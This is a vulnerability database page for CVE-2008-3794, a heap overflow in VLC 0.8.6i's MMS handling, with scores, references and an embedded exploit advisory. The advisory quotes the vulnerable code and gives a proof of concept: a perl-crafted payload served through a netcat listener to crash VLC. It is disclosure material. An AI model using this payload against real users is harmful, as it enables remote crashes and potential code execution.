CVE-2008-3794 : Detail

CVE-2008-3794

14.68%V3
Network
2008-08-26
13h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Integer signedness error in the mms_ReceiveCommand function in modules/access/mms/mmstu.c in VLC Media Player 0.8.6i allows remote attackers to execute arbitrary code via a crafted mmst link with a negative size value, which bypasses a size check and triggers an integer overflow followed by a heap-based buffer overflow.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 6293

Publication date : 2008-08-22 22h00 +00:00
Author : g_
EDB Verified : Yes

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - Orange Bat advisory - Name : VLC 0.8.6i MMS Protocol Handling Class : Heap Overflow Published : 2008-08-24 Credit : g_ (g_ # orange-bat # com) - - Details - This can be exploited from remote. User have to open mmst:// link poiting to server controlled by the attacker. vlc\modules\access\mms\mmstu.c : static int mms_ReceiveCommand( access_t *p_access ) { access_sys_t *p_sys = p_access->p_sys; for( ;; ) { int i_used; int i_status; if( NetFillBuffer( p_access ) < 0 ) { msg_Warn( p_access, "cannot fill buffer" ); return VLC_EGENERIC; } if( p_sys->i_buffer_tcp > 0 ) { [1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp, p_sys->i_buffer_tcp, &i_used ); [2] if( i_used < MMS_BUFFER_SIZE ) { [3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used, MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow (...) [1] - function that sets i_used to negative value, see below [2] - i_used is signed, so predicate is true [3] - actual overflow, we have good control over what is written static int mms_ParseCommand( access_t *p_access, uint8_t *p_data, int i_data, int *pi_used ) (...) i_length = GetDWLE( p_data + 8 ) + 16; (...) if( i_length > p_sys->i_cmd ) { msg_Warn( p_access, "truncated command (missing %d bytes)", i_length - i_data ); p_sys->i_command = 0; return -1; } [1] else if( i_length < p_sys->i_cmd ) { p_sys->i_cmd = i_length; [2] *pi_used = i_length; } (...) [1] - predicate is true [2] - sets i_used from mms_ReceiveCommand - - Proof of concept - on localhost: perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot nc -l -v -p 1755 < headshot open this url in VLC: mmst://127.0.0.1/ boom! headshot :) - - PGP - All advisories from Orange Bat are signed. You can find our public key here: http://www.orange-bat.com/g_.asc - - Disclaimer - This document and all the information it contains is provided "as is", without any warranty. Orange Bat is not responsible for the misuse of the information provided in this advisory. The advisory is provided for educational purposes only. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. (c) 2008 www.orange-bat.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70 iEYEARECAAYFAkiwgBkACgkQIUHRVUfOLgUKOgCdFOAznbm44YJWiEqaQJK7XaF2 AuIAnRjabi6RiPT6G/66kxseVG+K0rkj =/CN5 -----END PGP SIGNATURE----- # milw0rm.com [2008-08-23]

Products Mentioned

Configuraton 0

Videolan>>Vlc_media_player >> Version 0.8.6i

References

http://www.securityfocus.com/bid/30806
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/6293
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id?1020759
Tags : vdb-entry, x_refsource_SECTRACK
http://securityreason.com/securityalert/4190
Tags : third-party-advisory, x_refsource_SREASON
http://www.openwall.com/lists/oss-security/2008/08/24/3
Tags : mailing-list, x_refsource_MLIST
http://security.gentoo.org/glsa/glsa-200809-06.xml
Tags : vendor-advisory, x_refsource_GENTOO